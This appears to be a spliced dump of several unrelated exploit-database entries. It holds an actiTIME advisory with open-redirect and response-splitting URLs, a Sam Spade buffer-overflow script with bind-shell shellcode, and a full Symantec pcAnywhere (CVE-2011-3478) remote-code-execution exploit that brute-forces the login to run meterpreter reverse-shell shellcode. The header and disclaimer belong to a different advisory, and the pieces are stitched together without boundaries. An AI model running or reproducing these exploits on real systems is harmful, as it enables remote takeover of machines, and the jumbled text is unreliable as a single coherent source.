=======================
Local
Severity Level:
=========================================================
High
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
'''
actiTIME 2015.2 Multiple Vulnerabilities
Vendor: Actimind, Inc.
Product web page: http://www.actitime.com
Affected version: 2015.2 (Small Team Edition)
Summary: actiTIME is a web timesheet software. It allows you to
enter time spent on different work assignments, register time offs
and sick leaves, and then create detailed reports covering almost
any management or accounting needs.
Desc: The application suffers from multiple security vulnerabilities
including: Open Redirection, HTTP Response Splitting and Unquoted
Service Path Elevation Of Privilege.
Tested on: OS/Platform: Windows 7 6.1 for x86
Servlet Container: Jetty/5.1.4
Servlet API Version: 2.4
Java: 1.7.0_76-b13
Database: MySQL 5.1.72-community-log
Driver: MySQL-AB JDBC Driver mysql-connector-java-5.1.13
Patch level: 28.0
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5273
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5273.php
13.10.2015
--
1. Open Redirect
-----------------
http://localhost/administration/settings.do?redirectUrl=http://zeroscience.mk&submitted=1
2. HTTP Response Splitting
---------------------------
http://localhost/administration/settings.do?redirectUrl=%0a%0dServer%3a%20Waddup%2f2%2e0&submitted=1
Response:
HTTP/1.1 302 Moved Temporarily
Date: Wed, 14 Oct 2015 09:32:05 GMT
Server: Jetty/5.1.4 (Windows 7/6.1 x86 java/1.7.0_76
Content-Type: text/html;charset=UTF-8
Cache-Control: no-store, no-cache
Pragma: no-cache
Expires: Tue, 09 Sep 2014 09:32:05 GMT
X-UA-Compatible: IE=Edge
Location: http://localhost/administration/
Server: Waddup/2.0
Content-Length: 0
3. Unquoted Service Path Elevation Of Privilege
------------------------------------------------
C:\Users\joxy>sc qc actiTIME
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: actiTIME
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\actiTIME\actitime_access.exe startAsService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : actiTIME Server
DEPENDENCIES : actiTIME MySQL
SERVICE_START_NAME : LocalSystem
#!/usr/bin/python
# -*- coding: cp1252 -*-
# EXPLOIT TITLE: Sam Spade 1.14 Scan from IP address Field Exploit
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Luis Mart�nez
# Date of Testing: 2nd November 2015
# Download Link : https://www.exploit-db.com/apps/7ad7569341d685b4760ba4adecab6def-spade114.exe
# Tested On : Windows XP Service Pack 2
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called buffer.txt
# Step 3: Copy the contents of buffer.txt file
# Step 4: Now open Sam Spade 1.14
# Step 5: Go To 'Tools' > 'Scan Addresses...'
# Step 6: Paste the contents in 'Scan from IP addresses' input field
# Step 7: Connect to the target at port 4444 with ncat/nc
file = open('buffer.txt' , 'wb');
buffer = "A"*507 + "\x9f\x43\x30\x5d" #JMP ESP
buffer += "\x90"*20
# msfvenom -p windows/shell_bind_tcp -f c -b "\x00\x0a\x0d\x20\x0b\x0c"
buffer += ("\xba\x72\x30\xbb\xe7\xdd\xc1\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x53\x31\x50\x12\x83\xc0\x04\x03\x22\x3e\x59\x12\x3e\xd6\x1f"
"\xdd\xbe\x27\x40\x57\x5b\x16\x40\x03\x28\x09\x70\x47\x7c\xa6"
"\xfb\x05\x94\x3d\x89\x81\x9b\xf6\x24\xf4\x92\x07\x14\xc4\xb5"
"\x8b\x67\x19\x15\xb5\xa7\x6c\x54\xf2\xda\x9d\x04\xab\x91\x30"
"\xb8\xd8\xec\x88\x33\x92\xe1\x88\xa0\x63\x03\xb8\x77\xff\x5a"
"\x1a\x76\x2c\xd7\x13\x60\x31\xd2\xea\x1b\x81\xa8\xec\xcd\xdb"
"\x51\x42\x30\xd4\xa3\x9a\x75\xd3\x5b\xe9\x8f\x27\xe1\xea\x54"
"\x55\x3d\x7e\x4e\xfd\xb6\xd8\xaa\xff\x1b\xbe\x39\xf3\xd0\xb4"
"\x65\x10\xe6\x19\x1e\x2c\x63\x9c\xf0\xa4\x37\xbb\xd4\xed\xec"
"\xa2\x4d\x48\x42\xda\x8d\x33\x3b\x7e\xc6\xde\x28\xf3\x85\xb6"
"\x9d\x3e\x35\x47\x8a\x49\x46\x75\x15\xe2\xc0\x35\xde\x2c\x17"
"\x39\xf5\x89\x87\xc4\xf6\xe9\x8e\x02\xa2\xb9\xb8\xa3\xcb\x51"
"\x38\x4b\x1e\xcf\x30\xea\xf1\xf2\xbd\x4c\xa2\xb2\x6d\x25\xa8"
"\x3c\x52\x55\xd3\x96\xfb\xfe\x2e\x19\x12\xa3\xa7\xff\x7e\x4b"
"\xee\xa8\x16\xa9\xd5\x60\x81\xd2\x3f\xd9\x25\x9a\x29\xde\x4a"
"\x1b\x7c\x48\xdc\x90\x93\x4c\xfd\xa6\xb9\xe4\x6a\x30\x37\x65"
"\xd9\xa0\x48\xac\x89\x41\xda\x2b\x49\x0f\xc7\xe3\x1e\x58\x39"
"\xfa\xca\x74\x60\x54\xe8\x84\xf4\x9f\xa8\x52\xc5\x1e\x31\x16"
"\x71\x05\x21\xee\x7a\x01\x15\xbe\x2c\xdf\xc3\x78\x87\x91\xbd"
"\xd2\x74\x78\x29\xa2\xb6\xbb\x2f\xab\x92\x4d\xcf\x1a\x4b\x08"
"\xf0\x93\x1b\x9c\x89\xc9\xbb\x63\x40\x4a\xcb\x29\xc8\xfb\x44"
"\xf4\x99\xb9\x08\x07\x74\xfd\x34\x84\x7c\x7e\xc3\x94\xf5\x7b"
"\x8f\x12\xe6\xf1\x80\xf6\x08\xa5\xa1\xd2")
file.write(buffer);
file.close()
#!/usr/bin/python
################################################################
# Exploit Title: Symantec pcAnywhere v12.5.0 Windows x86 RCE
# Date: 2015-10-31
# Exploit Author: Tomislav Paskalev
# Vendor Homepage: https://www.symantec.com/
# Software Link: http://esdownload.symantec.com/akdlm/CD/MTV/pcAnywhere_12_5_MarketingTrialware.exe
# Version: Symantec pcAnywhere v12.5.0 Build 442 (Trial)
# Vulnerable Software:
# Symantec pcAnywhere 12.5.x through 12.5.3
# Symantec IT Management Suite pcAnywhere Solution 7.0 (aka 12.5.x) and 7.1 (aka 12.6.x)
# Tested on:
# Symantec pcAnywhere v12.5.0 Build 442 (Trial)
# --------------------------------------------
# Microsoft Windows Vista Ultimate SP1 x86 EN
# Microsoft Windows Vista Ultimate SP2 x86 EN
# Microsoft Windows 2008 Enterprise SP2 x86 EN
# Microsoft Windows 7 Professional SP1 x86 EN
# Microsoft Windows 7 Ultimate SP1 x86 EN
# CVE ID: 2011-3478
# OSVDB-ID: 78532
################################################################
# Vulnerability description:
# The application's module used for handling incoming connections
# (awhost32.exe) contains a flaw. When handling authentication
# requests, the vulnerable process copies user provided input
# to a fixed length buffer without performing a length check.
# A remote unauthenticated attacker can exploit this vulnerability
# to cause a buffer overflow and execute arbitrary code in the
# context of the exploited application (installed as a service
# by default, i.e. with "NT AUTHORITY\SYSTEM" privileges).
################################################################
# Target application notes:
# - the application processes one login attempt at a time
# (i.e. multiple parallel login requests are not possible)
# - available modules (interesting exploit wise):
# Name | Rebase | SafeSEH | ASLR | NXCompat | OS Dll
# -------------------------------------------------------------
# awhost32.exe | False | False | False | False | False
# ijl20.dll | False | False | False | False | False
# IMPLODE.DLL | False | False | False | False | False
# -------------------------------------------------------------
# - supported Windows x86 operating systems (pcAnywhere v12.5)
# - Windows 2000
# - Windows 2003 Server
# - Windows 2008 Server
# - Windows XP
# - Windows Vista
# - Windows 7
################################################################
# Exploit notes:
# - bad characters: "\x00"
# - Windows Vista, Windows 2008 Server, Windows 7
# - after a shellcode execution event occurs, the
# application does not crash and remains fully functional
# - one successful shellcode execution event has a low
# success rate (applies to all OSes)
# - in order to achieve an overall more reliable exploit,
# multiple shellcode executions need to be performed
# (until the shellcode is successfully executed)
# - brute force is a feasible method
# - multiple parallel brute force attacks are not possible
# - multiple valid offsets are available (i.e. not just the
# ones tested)
################################################################
# Test notes:
# - all tested OSes
# - clean default installations
# - all OS specific statistics referenced in the exploit are
# based on the test results of 10 attempts per tested offset
# - all attempts were performed after a system reboot (VM)
# - the provided test results should be taken only as a rough guide
# - in practice it might occur that the number of attempts
# needed to achieve successful exploitation is (much)
# higher than the maximum value contained in the test
# results, or that the exploit does not succeed at all
# - other (untested) offsets might provide better results
# - not letting the OS and application load fully/properly before
# starting the exploit may lead to failed exploitation (this
# observation was made during the testing of the exploit and
# applies mostly to Windows 7)
################################################################
# Patch:
# https://support.symantec.com/en_US/article.TECH179526.html
# https://support.norton.com/sp/en/us/home/current/solutions/v78694006_EndUserProfile_en_us
################################################################
# Thanks to:
# Tal zeltzer (discovered the vulnerability)
# S2 Crew (Python PoC)
################################################################
# In memoriam:
# msfpayload | msfencode [2005 - 2015]
################################################################
# References:
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3478
# http://www.zerodayinitiative.com/advisories/ZDI-12-018/
# https://www.exploit-db.com/exploits/19407/
################################################################
import socket
import time
import struct
import string
import sys
################################
### HARDCODED TARGET INFO ###
################################
# target server info
# >>> MODIFY THIS >>>
targetServer = "192.168.80.227"
targetPort = 5631
# Supported operating systems
vistaUltSP1 = {
'Version': 'Microsoft Windows Vista Ultimate SP1 x86 EN',
'Offset': 0x03e60000,
'PasswordStringLength': 3500,
'TestAttempts': [8, 62, 35, 13, 8, 7, 11, 23, 8, 10]
};
vistaUltSP2 = {
'Version': 'Microsoft Windows Vista Ultimate SP2 x86 EN',
'Offset': 0x03e60000,
'PasswordStringLength': 3500,
'TestAttempts': [16, 27, 13, 17, 4, 13, 7, 9, 5, 16]
};
s2k8EntSP2 = {
'Version': 'Microsoft Windows 2008 Enterprise SP2 x86 EN',
'Offset': 0x03dd0000,
'PasswordStringLength': 3500,
'TestAttempts': [25, 5, 14, 18, 66, 7, 8, 4, 4, 24]
};
sevenProSP1 = {
'Version': 'Microsoft Windows 7 Professional SP1 x86 EN',
'Offset': 0x03a70000,
'PasswordStringLength': 3500,
'TestAttempts': [188, 65, 25, 191, 268, 61, 127, 136, 18, 98]
};
sevenUltSP1 = {
'Version': 'Microsoft Windows 7 Ultimate SP1 x86 EN',
'Offset': 0x03fa0000,
'PasswordStringLength': 3500,
'TestAttempts': [23, 49, 98, 28, 4, 31, 4, 42, 50, 42]
};
# target server OS
# >>> MODIFY THIS >>>
#OSdictionary = vistaUltSP1
#OSdictionary = vistaUltSP2
#OSdictionary = s2k8EntSP2
#OSdictionary = sevenProSP1
OSdictionary = sevenUltSP1
# timeout values
shellcodeExecutionTimeout = 30
# client-server handshake
initialisationSequence = "\x00\x00\x00\x00"
handshakeSequence = "\x0d\x06\xfe"
# username string
usernameString = "U" * 175
# shellcode
# available shellcode space: 1289 bytes
# shellcode generated with Metasploit Framework Version: 4.11.4-2015090201 (Kali 2.0)
# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=192.168.80.223 LPORT=443 EXITFUNC=seh -e x86/shikata_ga_nai -b '\x00' -f python -v shellcode
# >>> MODIFY THIS >>>
shellcode = ""
shellcode += "\xda\xd3\xd9\x74\x24\xf4\xbf\x2c\x46\x39\x97\x5d"
shellcode += "\x33\xc9\xb1\x87\x83\xed\xfc\x31\x7d\x14\x03\x7d"
shellcode += "\x38\xa4\xcc\x6b\xa8\xaa\x2f\x94\x28\xcb\xa6\x71"
shellcode += "\x19\xcb\xdd\xf2\x09\xfb\x96\x57\xa5\x70\xfa\x43"
shellcode += "\x3e\xf4\xd3\x64\xf7\xb3\x05\x4a\x08\xef\x76\xcd"
shellcode += "\x8a\xf2\xaa\x2d\xb3\x3c\xbf\x2c\xf4\x21\x32\x7c"
shellcode += "\xad\x2e\xe1\x91\xda\x7b\x3a\x19\x90\x6a\x3a\xfe"
shellcode += "\x60\x8c\x6b\x51\xfb\xd7\xab\x53\x28\x6c\xe2\x4b"
shellcode += "\x2d\x49\xbc\xe0\x85\x25\x3f\x21\xd4\xc6\xec\x0c"
shellcode += "\xd9\x34\xec\x49\xdd\xa6\x9b\xa3\x1e\x5a\x9c\x77"
shellcode += "\x5d\x80\x29\x6c\xc5\x43\x89\x48\xf4\x80\x4c\x1a"
shellcode += "\xfa\x6d\x1a\x44\x1e\x73\xcf\xfe\x1a\xf8\xee\xd0"
shellcode += "\xab\xba\xd4\xf4\xf0\x19\x74\xac\x5c\xcf\x89\xae"
shellcode += "\x3f\xb0\x2f\xa4\xad\xa5\x5d\xe7\xb9\x57\x3b\x6c"
shellcode += "\x39\xc0\xb4\xe5\x57\x79\x6f\x9e\xeb\x0e\xa9\x59"
shellcode += "\x0c\x25\x84\xbe\xa1\x95\xb4\x13\x16\x72\x01\xc2"
shellcode += "\xe1\x25\x8a\x3f\x42\x79\x1f\xc3\x37\x2e\xb7\x78"
shellcode += "\xb6\xd0\x47\x97\x86\xd1\x47\x67\xd9\x84\x3f\x54"
shellcode += "\x6e\x11\x95\xaa\x3a\x37\x6f\xa8\xf7\xbe\xf8\x1d"
shellcode += "\x4c\x16\x73\x50\x25\xc2\x0c\xa6\x91\xc1\xb0\x8b"
shellcode += "\x53\x69\x76\x22\xd9\x46\x0a\x1a\xbc\xea\x87\xf9"
shellcode += "\x09\xb2\x10\xcf\x14\x3c\xd0\x56\xb3\xc8\xba\xe0"
shellcode += "\x69\x5a\x3a\xa2\xff\xf0\xf2\x73\x92\x4b\x79\x10"
shellcode += "\x02\x3f\x4f\xdc\x8f\xdb\xe7\x4f\x6d\x1d\xa9\x1d"
shellcode += "\x42\x0c\x70\x80\xcc\xe9\xe5\x0a\x55\x80\x8a\xc2"
shellcode += "\x3d\x2a\x2f\xa5\xe2\xf1\xfe\x7d\x2a\x86\x6b\x08"
shellcode += "\x27\x33\x2a\xbb\xbf\xf9\xd9\x7a\x7d\x87\x4f\x10"
shellcode += "\xed\x0d\x1b\xad\x88\xc6\xb8\x50\x07\x6a\x74\xf1"
shellcode += "\xd3\x2d\xd9\x84\x4e\xc0\x8e\x25\x23\x76\x60\xc9"
shellcode += "\xb4\xd9\xf5\x64\x0e\x8e\xa6\x22\x05\x39\x3f\x98"
shellcode += "\x96\x8e\xca\x4f\x79\x54\x64\x26\x33\x3d\xe7\xaa"
shellcode += "\xa2\xb1\x90\x59\x4b\x74\x1a\xce\xf9\x0a\xc6\xd8"
shellcode += "\xcc\x99\x49\x75\x47\x33\x0e\x1c\xd5\xf9\xde\xad"
shellcode += "\xa3\x8c\x1e\x02\x3b\x38\x96\x3d\x7d\x39\x7d\xc8"
shellcode += "\x47\x95\x16\xcb\x75\xfa\x63\x98\x2a\xa9\x3c\x4c"
shellcode += "\x9a\x25\x28\x27\x0c\x8d\x51\x1d\xc6\x9b\xa7\xc1"
shellcode += "\x8e\xdb\x8b\xfd\x4e\x55\x0b\x97\x4a\x35\xa6\x77"
shellcode += "\x04\xdd\x43\xce\x36\x9b\x53\x1b\x15\xf7\xf8\xf7"
shellcode += "\xcf\x9f\xd3\xf1\xf7\x24\xd3\x2b\x82\x1b\x5e\xdc"
shellcode += "\xc3\xee\x78\x34\x90\x10\x7b\xc5\x4c\x51\x13\xc5"
shellcode += "\x80\x51\xe3\xad\xa0\x51\xa3\x2d\xf3\x39\x7b\x8a"
shellcode += "\xa0\x5c\x84\x07\xd5\xcc\x28\x21\x3e\xa5\xa6\x31"
shellcode += "\xe0\x4a\x37\x61\xb6\x22\x25\x13\xbf\x51\xb6\xce"
shellcode += "\x3a\x55\x3d\x3e\xcf\x51\xbf\x03\x4a\x9d\xca\x66"
shellcode += "\x0c\xdd\x6a\x81\xdb\x1e\x6b\xae\x12\xd8\xa6\x7f"
shellcode += "\x65\x2c\xff\x51\xbd\x60\xd1\x9f\x8f\xb3\x2d\x5b"
shellcode += "\x11\xbd\x1f\x71\x87\xc2\x0c\x7a\x82\xa9\xb2\x47"
################################
### BUFFER OVERFLOW ###
### STRING CONSTRUCTION ###
################################
# Calculate address values based on the OS offset
pointerLocationAddress = OSdictionary['Offset'] + 0x00005ad8
pointerForECXplus8Address = OSdictionary['Offset'] + 0x00005ad4
breakPointAddress = OSdictionary['Offset'] + 0x000065af - 0x00010000
# jump over the next 38 bytes (to the begining of the shellcode)
jumpToShellcode = "\xeb\x26\x90\x90"
# pointerLocationAddress - the memory address location of the "pointerForECXplus8" variable
pointerLocation = struct.pack('<L', pointerLocationAddress)
# CALL ESI from the application module ijl20.dll [aslr=false,rebase=false,safeseh=false]
callESI = struct.pack('<L', 0x67f7ab23)
# pointerForECXplus8Address - the memory address location of the start of the DDDD string in the shellcode (Offset + 0x00005acc + 0x8)
pointerForECXplus8 = struct.pack('<L', pointerForECXplus8Address)
# construct the password string which will cause a buffer overflow condition and exploit the vulnerability
passwordString = (
"A" * 945 +
jumpToShellcode +
pointerLocation +
"D" * 4 +
pointerForECXplus8 +
callESI +
"\x90" * 20 +
shellcode +
"I" * (1289 - len(shellcode)) +
"\xaa" * (OSdictionary['PasswordStringLength'] - 945 - 4 * 5 - 20 - 1289)
)
################################
### FUNCTIONS ###
################################
# calculate and return the median value of the argument list
def calculateMedian(targetList):
sortedTargetList = sorted(targetList)
targetListLength = len(targetList)
medianIndex = (targetListLength - 1) / 2
if (targetListLength % 2):
return sortedTargetList[medianIndex]
else:
return ((sortedTargetList[medianIndex] + sortedTargetList[medianIndex + 1]) / 2)
# print an indented line with a type prefix
def printLine(infoType, indentDepth, textToDisplay):
# [I]nformational
if infoType == "I":
print (' ' * indentDepth),
print "\033[1;37m[*]\033[1;m", textToDisplay
# [E]rror
elif infoType == "E":
print (' ' * indentDepth),
print "\033[1;31m[-]\033[1;m", textToDisplay
# [S]uccess
elif infoType == "S":
print (' ' * indentDepth),
print "\033[1;32m[+]\033[1;m", textToDisplay
# [W]arning
elif infoType == "W":
print (' ' * indentDepth),
print "\033[1;33m[!]\033[1;m", textToDisplay
# [N]one
elif infoType == "N":
print (' ' * indentDepth),
print textToDisplay
# print the banner - general exploit info, target info, target OS statistics
def printBanner():
printLine ("I", 0, "Symantec pcAnywhere v12.5.0 Build 442 Login+Password field")
printLine ("N", 1, "Buffer Overflow Remote Code Execution exploit (CVE-2011-3478)")
printLine ("I", 1, "by Tomislav Paskalev")
printLine ("I", 0, "Target server information")
printLine ("I", 1, "IP address : " + targetServer)
printLine ("I", 1, "Port : " + str(targetPort))
printLine ("I", 0, "Exploit target information")
printLine ("I", 1, "Target OS : " + OSdictionary['Version'])
printLine ("I", 2, "Offset : " + "{:#010x}".format(OSdictionary['Offset']))
printLine ("I", 2, "Breakpoint (test) : " + "{:#010x}".format(breakPointAddress))
printLine ("I", 2, "Password length : " + str(OSdictionary['PasswordStringLength']))
printLine ("I", 2, "Test result stats")
printLine ("I", 3, "Test count : " + str(len(OSdictionary['TestAttempts'])))
printLine ("I", 3, "Reliability : " + str(((len(OSdictionary['TestAttempts']) - OSdictionary['TestAttempts'].count(0)) * 100) / len(OSdictionary['TestAttempts'])) + "%")
printLine ("I", 3, "Min attempt : " + str(min([element for element in OSdictionary['TestAttempts'] if element > 0])))
printLine ("I", 3, "Max attempt : " + str(max(OSdictionary['TestAttempts'])))
printLine ("I", 3, "Avg attempt : " + str(sum(OSdictionary['TestAttempts']) / len(OSdictionary['TestAttempts'])))
printLine ("I", 3, "Median attempt: " + str(calculateMedian(OSdictionary['TestAttempts'])))
# connect to the server and return the socket
def connectToServer(server, port):
# create socket
targetSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
targetSocket.connect((server, port))
except socket.error as msg:
if "[Errno 111] Connection refused" in str(msg):
return None
# return the opened socket
return targetSocket
# send the data to the server and return the response
def sendDataToServer(destSocket, dataToSend):
destSocket.send(dataToSend)
try:
receivedData = destSocket.recv(1024)
except socket.error as msg:
if "[Errno 104] Connection reset by peer" in str(msg):
return None
return receivedData
# run the exploit; exits when finished or interrupted
def runExploit():
printLine ("I", 0, "Starting exploit...")
attemptCounter = 0
# brute force the service until the shellcode is successfully executed
while True:
# connect to the target server
openSocket = connectToServer(targetServer, targetPort)
attemptCounter += 1
sleepTimer = 0
printLine ("I", 1, "Attempt no. " + str(attemptCounter))
printLine ("I", 2, "Sending initialisation sequence...")
# send the data; check outcome
while True:
receivedData = sendDataToServer(openSocket, initialisationSequence)
# check if server responded properly, if yes exit the loop
if receivedData:
if "Please press <Enter>..." in receivedData:
break
# exit if the service is unavailable
if attemptCounter == 1:
printLine ("E", 3, "Service unavailable")
printLine ("I", 4, "Exiting...")
exit(1)
# check if shellcode executed (based on a timer)
if sleepTimer > shellcodeExecutionTimeout:
print ""
printLine ("S", 4, "Shellcode executed after " + str(attemptCounter - 1) + " attempts")
printLine ("I", 5, "Exiting...")
exit(1)
# print waiting ticks
sys.stdout.write('\r')
sys.stdout.write(" \033[1;33m[!]\033[1;m Connection reset - reinitialising%s" % ('.' * sleepTimer))
sys.stdout.flush()
# sleep one second and reconnect
time.sleep(1)
sleepTimer += 1
openSocket.close()
openSocket = connectToServer(targetServer, targetPort)
if sleepTimer > 0:
print ""
printLine ("I", 2, "Sending handshake sequence...")
openSocket.send(handshakeSequence)
time.sleep(3)
data = openSocket.recv(1024)
printLine ("I", 2, "Sending username...")
openSocket.send(usernameString)
time.sleep(3)
printLine ("I", 2, "Sending password...")
openSocket.send(passwordString)
openSocket.close()
time.sleep(3)
# main function
if __name__ == "__main__":
printBanner()
try:
runExploit()
except KeyboardInterrupt:
print ""
sys.exit()
# End of file